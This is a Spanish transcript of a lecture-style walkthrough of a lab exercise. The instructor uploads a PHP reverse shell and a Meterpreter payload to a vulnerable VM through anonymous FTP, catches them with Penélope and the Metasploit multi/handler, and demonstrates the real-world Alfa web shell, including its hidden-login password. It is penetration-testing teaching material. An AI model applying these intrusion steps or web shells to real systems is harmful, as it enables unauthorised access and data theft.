muralla con una puerta súper defendida, no con tíos arriba, no, en el adarve de la muralla que te lanzan piedras o lo que sea, y a lo mejor otra puerta en la parte de atrás, en otro lado de la muralla. Dices tú, cojonudo, solamente hay un punto, 2 puntos de acceso al recinto del castillo, ¿no? Entonces es muy fácil proteger eso. Claro, de repente te llega un tío y te dice, joder, yo cada vez que quiero ir a coger agua al pozo tengo que dar una vuelta del copón. ¿Por qué no me abres aquí una puerta pequeñita para ahorrarme trabajo? Pues te abro la puerta pequeñita. Ahora ya no tienes 2 puertas bien defendidas, tienes 2 puertas bien defendidas y una pequeñita, ¿vale? Es más, no sé si viste la serie esta de Vikingos, ¿no? Ahora me vino a la cabeza, yo creo que era Vikingos. Bueno, que asaltan una fortaleza inexpugnable o no sé qué historia, aprovechándose de un portón donde había un pozo de agua y no estaba bien defendido. Bueno, no sé si era esa serie o una de ese estilo. No sé si era Vikingos o era esta de... Bueno, una de estas de Netflix. Pues esto sería más o menos lo mismo, ¿vale? Bien, web service PHP. Tengo esta de aquí, que es la que me interesa. Pues yo hago un copy de esta web shell. Yo lo voy a guardar con otro nombre para que no me sea tan rollo escribirlo. La voy a copiar en mi carpeta personal con este nombre. Y ahora la edito. Y aquí está la clave. Bueno, muchos comentarios explicando de qué va esto, bla, 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 bla. Y aquí están las 2 líneas importantes. Las reverse shell hay que personalizarlas con los datos del socket, es decir, la dirección IP y el puerto donde la máquina del atacante va a estar escuchando y esperando a recibir la terminal del otro equipo, ¿vale? Bueno, yo creo que la IP era esta, si no me falla la memoria.
IP-ADDR y tengo la IP 99. Vale, pues ya tengo personalizada mi web shell, la IP de mi máquina atacante, el puerto donde he puesto a Penélope a la escucha y nada, grabo los cambios, control X. Ahora tengo que subir esta web shell al servidor remoto y en concreto a la carpeta donde el servidor va a buscar las páginas web, y eso lo hacía con el FTP anónimo. Pues hago un FTP a la máquina 158, que es la vulnerable, como usuario Anonymous, contraseña cualquier cosa, y ahora le hago un put del fichero con la reverse shell dir, y aquí la tengo. Vale, pues ahora ya tengo todas las piezas del rompecabezas preparadas, porque tengo por un lado aquí a Penélope, que está a la escucha en la IP y el puerto que me interesa. Bueno, y aquí simplemente tengo que recurrir al navegador y decirle: servidor web, quiero que ejecutes esto. De hecho, fijaros, cuando yo hago un dir, tengo el index HTML, el privacy, el hola txt que yo subí, y ahora tengo mi reverse shell. Esto es el document root del Apache. Bueno, aprovechando que ya tengo aquí la terminal del pirata, os lo puedo confirmar. Normalmente en las máquinas Debian el Apache suele tener las páginas web en este directorio: /var /3w /html. Pues si yo hago un ls, veis que tiene los mismos ficheros. Yo con el FTP anónimo consigo subir ficheros al document root, es decir, la carpeta web desde donde Apache va a servir las páginas que le solicitan. Bueno, pues ya está. Solicito visitar la página reverse.php y aquí lo tengo. Bueno, aquí el navegador se me queda medio tonto, está como cargando y no consigue cargar nada, pero mi objetivo ya lo he cumplido. Penélope, que estaba escuchando en el puerto 6666, got reverse shell, ha obtenido una conexión inversa procedente de una máquina que se llama Friendly, que tiene el IP 158, y además, como esta es una conexión que me da una reverse shell con una terminal muy básica, no hay autocompletado, no puedo hacer control C si no aborto la conexión, no puedo ejecutar comandos interactivos como sudo o editar un fichero, pues Penélope intenta actualizar la shell a una PTI, es decir, una terminal completa, y me dice que lo ha conseguido usando el método que usábamos nosotros del Python, ¿vale? Nosotros vimos el método con el Python y el método con el programilla script, ¿vale? Lo de Python -c, import PTI, todo ese rollo. Bien, y aquí ya tengo. Y aquí que me decían, bueno, pues una vez que tengas la conexión, ejecuta whoami y pwd, pues ya estaría. Esto sería la solución al ejercicio, ¿vale? La personalización súper importante de la web shell. Estas líneas es súper importante porque si yo no las personalizo, mi web shell pues terminará en, como digo yo, en casa Dios, en otro lado. Bueno, pues aquí lo tengo. Algo muy importante y muy a tener en cuenta cuando uno utiliza web shells: la web shell se va a ejecutar con los permisos del usuario con el que corre el servidor web. Lo más normal es que los servidores web tipo Apache, Nginx, se ejecutan en los equipos como usuarios no privilegiados. Es decir, el arranque de Apache o Nginx si se hace como usuario con privilegios para poder utilizar el puerto 80 o el 443 en el caso del HTTPS, pero inmediatamente después se separa en otro proceso que ya se ejecuta como usuario no privilegiado, normalmente www-data, www o Apache o Nginx, depende del servidor, ¿no? Y esto es muy importante porque los comandos, las actuaciones que yo puedo hacer en la máquina víctima con esta línea de comandos están limitadas a este usuario. Vale, este usuario me puede leer el fichero passwd. ¿Por qué? Porque este fichero lo puede leer cualquiera.
en una máquina Linux, pero el shadow ya no me lo permite leer, ¿vale? Esto es lo que veremos en el siguiente tema de posexplotación, de escalada de privilegios, pero bueno, el ejercicio que os pedían era este. Luego también nos hablaban por ahí de repetir lo mismo pero con Metasploit, ¿vale? Con Metasploit pues es algo parecido a Penélope pero utilizando el ecosistema de Metasploit. Entonces os decía, bueno, esto ya lo puedo dejar por ahí, hago un exit y sesiones pues no tengo ninguna y cierro Penélope, ¿vale? ¿Qué me decían con Metasploit? Bueno, pues que generase una shell de tipo Meterpreter, de tipo PHP, utilizando este comando. Entonces yo voy a hacer aquí un copy-paste. Vale, el MSFVenom me permite generar payloads. ¿Vale? Un payload puede ser una página web, puede ser una página web PHP, una página web ASP, puede ser un ejecutable .exe de Windows, puede ser un ejecutable .elf de Linux, puede ser código Visual Basic para embeberlo en una macro de Word, por ejemplo. Bien, y como toda buena reverse shell, que aquí veis que es una reverse shell de tipo PHP y de tipo Meterpreter, es decir, me va a dar una línea de comandos de tipo Meterpreter, tengo que personalizarla. ¿Dónde se va a recibir la reverse shell? En la IP de la máquina Kali. ¿Y dónde se va a recibir? ¿En qué puerto? Pues en el enunciado del examen nos decían en el puerto 1, 2, 3, 4. Bien, pues lo ejecuto y esto me va a generar un fichero de texto de nombre shell.php que cuando se ejecute en el servidor web me va a devolver una línea de comandos de tipo Meterpreter hacia este socket. Lo que os decía en los apuntes, que teníais que editar este fichero porque por defecto viene comentado. Entonces yo simplemente borro ese comentario, esos dos primeros caracteres de este código, y lo único que tengo que hacer ahora es subirlo mediante el FTP anónimo, como os decía el enunciado. Pues nada, otra vez Anonymous, contraseña cualquiera, y hago un put del shell.php dir, y ahí lo tengo, ¿vale? Esta es la parte fácil. Ya tengo subido mi PHP web shell de Meterpreter. Y ahora, ¿cómo tengo que personalizar? O sea, ¿cómo tengo que recibir esto que he preparado? Bueno, pues muy sencillo. MSFVenom genera un payload de tipo PHP Meterpreter reverse TCP y tengo que configurar Metasploit para recibirlo. Bueno, pues sudo msfconsole y aquí el módulo que está en los apuntes es el multihandler, es el ideal, ¿vale? Aquí, bueno, ya paso de buscarlo, bueno, si lo busco porque no me sé la ruta completa, sé que se llama multihandler. Y aquí lo tengo, es un módulo de explotación que tiene un uso muy específico y es tipo convertir a Metasploit Framework en una especie de Netcat o en una especie de Penélope, pero con vitaminas, que está preparado para atender reverse shells de los múltiples tipos que él soporta. Es más, esta reverse shell que nosotros creamos con MSFVenom, un Netcat o un Penélope no lo van a entender, ¿vale? Porque es un tipo Meterpreter que solamente entiende Metasploit. Bueno, pues yo tengo el módulo cargado, el multihandler, que se encarga de atender esas reverse shells, y ahora lo tengo que personalizar con 3 parámetros. lhost, lport, esto me va a decir quién lo recibe, y aquí es muy sencillo. Os vuelvo a poner el comando que yo utilicé para personalizar la reverse shell. Tengo que clonar esto en la configuración del multihandler. ¿Qué equipo es el que va a recibir la reverse shell? El 158.
variable host, set lhost, la IP del 158. ¿A qué puerto se le va a enviar la reverse shell? Al 1234, set lport 1234. Y ahora la clave. ¿Y qué tipo de payload, qué tipo de carga va a recibir el multihandler? Porque por defecto os dice payload, por defecto es este. No, yo no quiero ese payload. Set payload. ¿Y qué tipo de payload? El que tú me has indicado aquí. La opción "-p en sfvenom" es el tipo de payload que quieres configurar. Pues yo lo pongo así, ¿vale? Y ahora, sin entrar en florituras, me llegaba con un RAM o con un exploit. RAM o exploit, cualquiera de estos dos comandos ya me funciona. Lanzo el RAM y se queda el multihandler a la escucha. Si os fijáis, vale, aquí se pone a la escucha, a ver si esto funciona. No tendría por aquí yo algún puerto ocupado con algo, no. Bien, pues ahora, si todo fue bien, yo vuelvo aquí. Aquí tengo mi servidor web y como yo subí mi web shell de tipo meterpreter con este nombre de fichero, shell.php, le doy ahí y no me funciona. ¿Y por qué no me funciona? Si está todo bien. No, hostia, perdón, lo hice mal yo. Metedura de pata brutal. Ahí estamos todos despistados. Me equivoqué yo. Bueno, pues de los errores aprende también. Fallo garrafal. La reverse shell me la lanza la máquina víctima. La máquina víctima es la que tiene el IP158. Vale, ¿quién va a recibir la reverse shell? La máquina 99, la máquina Kali. Vale, perdón por el error. Es la máquina Kali. Entonces tengo que volver a hacerlo. Genero el fichero apuntando a mi máquina Kali. Ahora veo aquí, efectivamente, ahora apunto a la máquina Kali. Subo el fichero, el bueno, vale, put shell.php. Bien, y ahora pues tengo que reconfigurar el multihandler. Vale, show options, tengo todas las opciones bien menos esta. Vale, insisto, en una reverse shell tengo que especificar el socket, la IP y el puerto que va a recibir la línea de comando remota. Tengo que ponerla de mi máquina atacante, evidentemente. Ahora ya lo tengo, ¿vale? Show options, perfecto. Y ahora con el RAM debería funcionar, si no me hace quedar mal. Vale, de ahí el mensaje ese raro que me salía antes. Vale, aquí me dice starter reverse TCP handler en la IP de la máquina Kali 1234. Bien. Y ahora, sí, yo vengo aquí y le digo, quiero conectarme a la reverse shell de tipo meterpreter. ¿Qué ha pasado aquí? El servidor web Apache se encuentra en la página web shell.php, código PHP legítimo, código de verdad PHP, lo ejecuta y lo que está ocurriendo aquí es que se lanza una conexión contra mi máquina Kali al puerto 1234, la recibe el multihandler y el multihandler le dice, bien, te recibo, establezco una tubería de datos entre la máquina atacante y la máquina víctima, sending stage, este es un payload que se envía en partes, es decir, la primera parte que yo subí en el shell.php es la mínima imprescindible para establecer una tubería de comunicaciones y cuando se establece la tubería yo le envío la segunda parte del payload, que es la más pesada y la más potente, y cuando llega a esa segunda parte del payload y se ejecuta en la máquina víctima, pues me sale este mensaje. Hay una sesión de meterpreter abierta. Y aquí, pues nada, ya puedo, si alguien no se acuerda de los comandos, hace un help y aquí ve los comandos que tiene a su disposición. Esto se está ejecutando en la máquina víctima. Sysinfo, creo que era lo que preguntaban. Este era un comando, sysinfo, para ver la información del sistema y para ver quién eres, bueno, pues
Desde Meterpreter haces un getUID y ya te dice quién eres. Y si no, pues bueno, siempre puedes ejecutar un shell y aquí ejecutas comandos. ¿De acuerdo? Bueno, pues esta sería la parte del Meterpreter. Muy importante, súper importante, aunque esto ya os digo que lo seguiremos trabajando, la configuración del multihandler. Esto incluso se puede automatizar. Yo me creo un ficherito y que me automatiza la configuración del multihandler. Pero cosas claves: IP, puerto de la máquina que va a recibir la reverse shell, es decir, la máquina atacante. El payload, el mismo que se definió en el MSF Venom, ¿vale? Entonces el MSF Venom y el multihandler tienen configuraciones que son clonadas. El payload tiene que ser exactamente el mismo. La IP y el puerto que van a recibir la reverse shell tienen que ser las mismas que configuran el multihandler. Y con esto ya estaría, ¿vale? Bueno, a mayores en este ejercicio os propuse, esto ya no era del examen, pero os propuse que le echases un vistazo al código de esta web shell alfa.pjar, alfa.php, me da igual, y que la subas al servidor web víctima y la ejecutes. Bueno, yo la voy a subir sin revisar el código para que os llevéis una sorpresa si alguien no tuvo tiempo todavía de jugar con ella. Y aquí bueno, pues tengo que conseguir, a ver si tengo carpetas compartidas y ya la comparto. Bueno, voy a compartir aquí una carpeta y aquí ya tengo la alfa.pjar y bueno, me la copio aquí al Kali. Bien, esto es un fichero PHP de toda la vida, es decir, le llaman extensión .pjar, pero bueno, esto si buscáis en Google vais a ver que a los ficheros PHP, pues a lo largo de la historia se le suele poner, incluso voy aquí a la Wikipedia. Los ficheros PHP, normalmente los servidores web los identifican con extensión PHP, PHTML, PHP5, PHP 6, 7, 8, incluso pjar o far, o como lo pronunciéis, como queráis. Bien, PHP de toda la vida, ¿vale? Bien, pues voy a subir este ficherito. Bueno, usuario Anonymous. Lo chulo de esta web shell es que es una web shell utilizada en incidentes reales de no hace mucho tiempo que afectaron a entidades, pues bueno, de distintas partes de España. Lo que me dijo un colega, que fue el que me pasó esta, y bueno, y alguna otra más, estaban por medio ciberdelincuentes de la India, Pakistán, bueno, de países por ahí de Asia. Bien, pues yo subí con el nombre de alfa.pjar. Entonces vengo aquí, vale, yo tengo aquí mi servidor web y alfa.pjar. Bien, error, me dice que no tengo permiso para acceder a alfa.pjar en este servidor. Bueno, este es un error que seguramente a muchos de nosotros nos ha pasado al visitar algún sitio web, o me sale la típica página de página no encontrada, error 404, este tipo de mensajes así y tal. Bueno, esto es una versión de la alfa, de la web shell alfa, que yo ya digamos que preparé para activar este mecanismo de ocultación. La web shell alfa está completamente operativa, solamente que activé un modo de ocultación, porque para acceder a esta web shell tengo que darme cuenta que si yo paso el ratón, y aquí hay que quitarse el sombrero porque los tíos son unos fenómenos,
Si yo paso el ratón por la página web, veo que el ratón es normal, pero si me pongo por aquí con el ratón debajo de la palabra Apache, pues, y pincho por ahí, pues antes o después veis que se transforma, bueno, dependiendo del navegador, al pasar el ratón por aquí ya se me cambia el cursor y me indica que hay un formulario, ¿vale? En esta versión de Apache de Kali, pues tengo que pinchar con el ratón y me sale un formulario. Este formulario es que me están pidiendo una contraseña de acceso. Contraseña de acceso que está metida en el código aquí arriba. Esta es la contraseña. EHSAN. Si metiese la contraseña, pues llego a esta maravilla. Esta es una web shell de las que se utilizan en incidentes reales. Y esto es como una... bueno, como una consola para controlar un equipo. Aquí ya le sale al operador información general. Comando UNAME, me dice qué versión de sistema operativo es, el kernel, me dice qué usuario soy, porque esta es una página web ejecutada por un servidor web Apache, y yo estoy ejecutando esto con los privilegios del usuario Apache, www-data, usuario con el UID 33. Versión de PHP, algún parámetro de PHP que me dice, la dirección IP del servidor, cuál es la mía, desde donde yo me estoy conectando, cuál es la hora del sistema. Bueno, se ha tomado la molestia de buscar ficheros ejecutables en la máquina que son de interés, PHP, PER, TAR, gzip y INC. Hay un netcat en la máquina. ¿Por qué ha encontrado esto? E incluso porque se ha preocupado de buscar downloaders, es decir, programas para descargar cosas, porque son herramientas a las que él puede recurrir en una fase de postexplotación. Se pueden hacer reverse shells con PHP, se pueden hacer reverse shells con PER, se pueden hacer reverse shells con netcat, y supongo que con gzip y con tar, si vais a GTFOBINS también habrá cosas por ahí chulas. ¿Por qué se preocupa de ver si hay un programa de descarga? wget, porque yo voy a poder instruir a la máquina víctima a ejecutar el comando wget para descargarse ficheros de internet. Evidentemente tengo que buscar una carpeta donde este usuario www-data pueda escribir en el sistema Linux, pero bueno, malo será que en /tmp no pueda escribir, ¿vale? Y luego aquí pues tengo ya herramientas de botón gordo, como se suelen llamar. Aquí tengo un explorador de archivos, aquí tengo los ficheros que hay en el document root del servidor web. Está el index, está el privacy, ¿vale? Y si quiero puedo recorrer el disco duro del equipo. Estoy en el barra, ¿no? Y aquí habrá un barra home. Bueno, no estoy en el barra bar todavía. Voy subiendo niveles, estoy en la raíz. Tengo el barra root que no me va a dejar entrar, porque no tengo permisos, pero tengo aquí el barra home. Barra home, en el barra home pues tengo dos usuarios, tengo el autor de la máquina, Rijava, y aquí pues tengo carpetillas, ¿vale? Donde yo podría pues seguir buscando información, ¿vale? Aquí a lo mejor pues hay cosas interesantes para escalar privilegios, ¿de acuerdo? ¿Qué más tengo? Herramientas por aquí, pues tengo una terminal pues para ejecutar comandos. Todo esto se está ejecutando vía página web en el servidor remoto, ¿vale? cat/tc passwd. Evidentemente todo depende de los permisos que tiene el usuario, lo que veíamos antes. Yo no puedo ver determinados ficheros. Estoy con un usuario que debería escalar privilegios. Bueno, un minuto y acabo, que tengo ahora una reunión, ¿vale? Y bueno, si jugáis con esto, pues más cosas. Tengo aquí para ver procesos del sistema, tengo un gestor de bases de datos SQL. Perdón, si aquí conozco los datos de conexión a una base de datos, pues puedo hacer cositas. Bueno, database dumper para hacer volcados de bases de datos. Bueno, la de Dios hay por aquí, ¿vale? Esto es por escáner. Esto me permitiría hacer un análisis de puertos desde la máquina donde estoy, ¿vale?
recordar el dibujo que os puse antes. Si yo esto lo instalo en la máquina server de la DMZ externa, estoy ubicado en la DMZ externa y puedo hacer el barrido de puertos desde dentro de la DMZ externa y puedo descubrir cosas que desde fuera no podría hacer. Bueno, una herramienta con la que podéis jugar, pues creo que puede hacer páginas de portales de autenticación fakes, bueno, la hostia. Y también, si miráis por ahí, también hay un rollo de reverse shell, bueno, no lo veo, pero bueno, está por aquí. Si buscáis por aquí, tiene rollos para subir ficheros, reverse shell, bueno, una herramienta curiosa, ¿vale? Bueno, pues ahora sí os tengo que dejar, que tengo por aquí una reunión, ¿vale?